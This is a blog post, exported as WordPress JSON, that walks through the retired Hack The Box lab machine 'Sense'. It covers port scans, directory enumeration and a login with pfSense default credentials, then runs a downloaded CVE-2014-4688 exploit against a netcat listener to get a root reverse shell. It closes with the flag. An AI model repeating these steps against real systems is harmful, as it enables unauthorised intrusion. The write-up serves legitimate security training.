{"id":102,"date":"2024-11-13T09:13:29","date_gmt":"2024-11-13T01:13:29","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=102"},"modified":"2024-11-13T09:51:34","modified_gmt":"2024-11-13T01:51:34","slug":"htb_machine_sense","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/htb_machine_sense\/","title":{"rendered":"HTB Machine Sense Penetration Test Notes"},"content":{"rendered":"<hr \/>\n<h1>Target Information<\/h1>\n<blockquote><p><strong>IP address:<\/strong> <code>10.10.10.60<\/code><\/p><\/blockquote>\n<hr \/>\n<h1>Information Gathering<\/h1>\n<h2>ICMP Check<\/h2>\n<pre><code class=\"language-plain\">\u250c\u2500\u2500(root\u327fhacker)-[\/home\/\u2026\/Documents\/pentest_notes\/sense\/nmap_reports]\n\u2514\u2500# ping -c 4 10.10.10.60\nPING 10.10.10.60 (10.10.10.60) 56(84) bytes of data.\n64 bytes from 10.10.10.60: icmp_seq=1 ttl=63 time=336 ms\n64 bytes from 10.10.10.60: icmp_seq=2 ttl=63 time=329 ms\n64 bytes from 10.10.10.60: icmp_seq=3 ttl=63 time=336 ms\n64 bytes from 10.10.10.60: icmp_seq=4 ttl=63 time=334 ms\n\n--- 10.10.10.60 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3002ms\nrtt min\/avg\/max\/mdev = 329.438\/333.697\/335.909\/2.584 ms<\/code><\/pre>\n<p>Connectivity between the attacking machine and the target is good.<\/p>\n<h2>Firewall Detection<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jun 21 10:31:29 2024 as: nmap -sA -p- --min-rate 2000 -oN .\/ack_result.txt 10.10.10.60\nNmap scan report for 10.10.10.60 (10.10.10.60)\nHost is up (0.34s latency).\nAll 65535 scanned ports on 10.10.10.60 (10.10.10.60) are in ignored states.\nNot shown: 65535 filtered tcp ports (no-response)\n\n# Nmap done at Fri Jun 21 10:32:37 2024 -- 1 IP address (1 host up) scanned in 68.60 
seconds<\/code><\/pre>\n<p>The state of the target's firewall could not be determined.<\/p>\n<h2>Network Port Scan<\/h2>\n<p><code>TCP<\/code><strong> port scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jun 21 10:35:26 2024 as: nmap -sS -sV -A -p- --min-rate 2000 -oN .\/tcp_result.txt 10.10.10.60\nNmap scan report for 10.10.10.60 (10.10.10.60)\nHost is up (0.34s latency).\nNot shown: 65533 filtered tcp ports (no-response)\nPORT    STATE SERVICE  VERSION\n80\/tcp  open  http     lighttpd 1.4.35\n|_http-title: Did not follow redirect to https:\/\/10.10.10.60\/\n|_http-server-header: lighttpd\/1.4.35\n443\/tcp open  ssl\/http lighttpd 1.4.35\n| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)\/organizationName=CompanyName\/stateOrProvinceName=Somewhere\/countryName=US\n| Not valid before: 2017-10-14T19:21:35\n|_Not valid after:  2023-04-06T19:21:35\n|_http-title: Login\n|_ssl-date: TLS randomness does not represent time\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose|specialized\nRunning (JUST GUESSING): OpenBSD 4.X (91%), Comau embedded (89%), Linux 2.6.X (87%)\nOS CPE: cpe:\/o:openbsd:openbsd:4.0 cpe:\/o:linux:linux_kernel:2.6.29\nAggressive OS guesses: OpenBSD 4.0 (91%), Comau C4G robot control unit (89%), Linux 2.6.29 (87%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 3 hops\n\nTRACEROUTE (using port 443\/tcp)\nHOP RTT       ADDRESS\n1   335.36 ms 10.10.14.1 (10.10.14.1)\n2   ...\n3   340.99 ms 10.10.10.60 (10.10.10.60)\n\nOS and Service detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Jun 21 10:37:17 2024 -- 1 IP address (1 host up) scanned in 110.46 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong> open port list scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jun 21 10:33:16 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.60\nNmap scan report for 10.10.10.60 (10.10.10.60)\nHost is up (0.34s latency).\nAll 65535 scanned ports on 10.10.10.60 (10.10.10.60) are in ignored states.\nNot shown: 65535 open|filtered udp ports (no-response)\n\n# Nmap done at Fri Jun 21 10:34:25 2024 -- 1 IP address (1 host up) scanned in 69.23 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong> port detailed information scan results<\/strong><\/p>\n<pre><code class=\"language-plain\">(none)<\/code><\/pre>\n<p>The scan also shows that the target's operating system is <code>OpenBSD<\/code>, roughly version <code>4<\/code>.<\/p>\n<hr \/>\n<h1>Web Service Probing<\/h1>\n<p>Opening the home page, <code>http:\/\/10.10.10.60\/<\/code>, shows that the target runs the <code>pfSense<\/code> open-source application-layer firewall system:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1719013664326-6ba652da-c57e-4e15-ba3f-18ef34938be0.png\" alt=\"\" \/><\/p>\n<p>Scan the directories directly:<\/p>\n<pre><code class=\"language-plain\"># Dirsearch started Sat Jun 22 08:00:59 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u https:\/\/10.10.10.60\/ -x 400,403,404 -t 60 -e php,js,html,txt,zip,tar.gz,pcap\n\n200   199B   https:\/\/10.10.10.60\/changelog.txt\n301     0B   https:\/\/10.10.10.60\/classes    -&gt; REDIRECTS TO: https:\/\/10.10.10.60\/classes\/\n301     0B   https:\/\/10.10.10.60\/css    
-&gt; REDIRECTS TO: https:\/\/10.10.10.60\/css\/\n200     1KB  https:\/\/10.10.10.60\/favicon.ico\n301     0B   https:\/\/10.10.10.60\/includes    -&gt; REDIRECTS TO: https:\/\/10.10.10.60\/includes\/\n200   329B   https:\/\/10.10.10.60\/index.html\n301     0B   https:\/\/10.10.10.60\/installer    -&gt; REDIRECTS TO: https:\/\/10.10.10.60\/installer\/\n301     0B   https:\/\/10.10.10.60\/javascript    -&gt; REDIRECTS TO: https:\/\/10.10.10.60\/javascript\/\n200     6KB  https:\/\/10.10.10.60\/license.php\n200     6KB  https:\/\/10.10.10.60\/stats.php\n200     6KB  https:\/\/10.10.10.60\/status.php\n200     6KB  https:\/\/10.10.10.60\/system.php\n301     0B   https:\/\/10.10.10.60\/themes    -&gt; REDIRECTS TO: https:\/\/10.10.10.60\/themes\/\n200   384B   https:\/\/10.10.10.60\/xmlrpc.php<\/code><\/pre>\n<p>A second wordlist also turned up the <code>\/tree<\/code> directory.<\/p>\n<p>Visiting <code>\/changelog.txt<\/code> returns the following:<\/p>\n<pre><code class=\"language-plain\"># Security Changelog \n\n### Issue\nThere was a failure in updating the firewall. 
Manual patching is therefore required\n\n### Mitigated\n2 of 3 vulnerabilities have been patched.\n\n### Timeline\nThe remaining patches will be installed during the next maintenance window<\/code><\/pre>\n<p>This tells us that <code>2<\/code> of the <code>3<\/code> vulnerabilities have already been patched.<\/p>\n<p>Visiting <code>\/index.html<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1719016389338-b94d939a-7a49-4037-b1ba-53e644ebb75e.png\" alt=\"\" \/><\/p>\n<p>The page contains an odd link pointing to <code>\/dfuife.cgi<\/code> (it never responds when visited) and a comment:<\/p>\n<pre><code class=\"language-html\">&lt;HTML&gt;\n&lt;BODY&gt;\n\n&lt;center&gt;\n\n&lt;img src='fred.png'&gt;\n\n&lt;p&gt;\n    &lt;A HREF='\/dfuife.cgi'&gt;Begin installation&lt;\/A&gt;\n&lt;\/p&gt;\n\n&lt;!--\n&lt;p&gt;\n    Connect to host via SSH: \n    &lt;applet CODEBASE=\".\" ARCHIVE=\"jta20.jar\" CODE=\"de.mud.jta.Applet\" WIDTH=55 HEIGHT=25&gt;\n    &lt;param NAME=\"config\" VALUE=\"applet.conf\"&gt;\n    &lt;\/applet&gt;\n&lt;\/p&gt;\n--&gt;\n\n&lt;\/center&gt;\n\n&lt;\/BODY&gt;\n&lt;\/HTML&gt;<\/code><\/pre>\n<p>Visiting the <code>\/tree<\/code> directory:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1719017535353-bc18fbd7-301a-48ef-8e41-5e33eb0f7402.png\" alt=\"\" \/><\/p>\n<p>Its purpose is unclear, and a directory scan of it turned up nothing at all.<\/p>\n<p>An attempt to brute-force the <code>pfSense<\/code> login failed. (After too many login attempts, web access is cut off outright.)<\/p>\n<hr 
\/>\n<h1>Penetration Testing<\/h1>\n<h2>Directory Enumeration with a Large Wordlist<\/h2>\n<p>Try enumerating the web root with the <code>Gobuster<\/code> tool and the large wordlist <code>directory-list-2.3-medium.txt<\/code>:<\/p>\n<pre><code class=\"language-bash\">gobuster dir -u https:\/\/10.10.10.60\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -t 60 -k -b 400,403,404 -x .php,.js,.html,.txt<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1719027806675-9550e1ad-9db5-41be-9700-976cc5bc9157.png\" alt=\"\" \/><\/p>\n<p>This turned up the file <code>system-users.txt<\/code>. Visiting it returns the following:<\/p>\n<pre><code class=\"language-plain\">####Support ticket###\n\nPlease create the following user\n\nusername: Rohit\npassword: company defaults<\/code><\/pre>\n<p>This reveals the user <code>rohit<\/code>, but the password field reads <code>company defaults<\/code>, so try the <code>pfSense<\/code> default password:<\/p>\n<ul>\n<li><strong>Username:<\/strong> <code>rohit<\/code><\/li>\n<li><strong>Password:<\/strong> <code>pfsense<\/code><\/li>\n<\/ul>\n<p><strong>Login succeeded:<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1719028186442-cb646a01-c4d8-4f04-a047-c8bfa2ec7b22.png\" alt=\"\" \/><\/p>\n<p>This also shows that the <code>pfSense<\/code> version is <code>v2.1.3<\/code>.<\/p>\n<h2>Exploiting the Command Execution Vulnerability<\/h2>\n<p>Searching public vulnerability databases turned up a command execution vulnerability, <code>CVE-2014-4688<\/code>:<\/p>\n<p><img decoding=\"async\" 
src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1719028512723-37e7ff3b-91ea-4842-aff5-ecc3c56e1b3b.png\" alt=\"\" \/><\/p>\n<p>Download the <code>EXP<\/code> and run it:<\/p>\n<pre><code class=\"language-bash\">rlwrap nc -l -p 443 -s 10.10.14.2\n.\/exp.py --rhost 10.10.10.60 --lhost 10.10.14.2 --lport 443 --username rohit --password pfsense<\/code><\/pre>\n<p>The reverse shell connected:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1719029033408-1df83572-95fd-4713-a9e3-ca32057a183e.png\" alt=\"\" \/><\/p>\n<p><del><span style=\"color: #df2a3f; background-color: #fbde28;\">And, surprisingly, it is <code>root<\/code> privileges right away????!!!\u2211(\uff9f\u0414\uff9f\u30ce)\u30ce<\/span><\/del><\/p>\n<hr \/>\n<h1>Flag File<\/h1>\n<pre><code class=\"language-plain\">d08c32a5d4f8c8b10e76eb51a69f1a86<\/code><\/pre>\n<hr \/>\n<h1>End of This Machine's Penetration Test<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>Target Information IP address: 10.10.10.60 Information Gathering ICMP Check \u250c\u2500\u2500(root\u327fhacker)-[\/home\/\u2026\/Docum 
&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-102","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/102","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=102"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/102\/revisions"}],"predecessor-version":[{"id":103,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/102\/revisions\/103"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=102"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=102"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=102"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}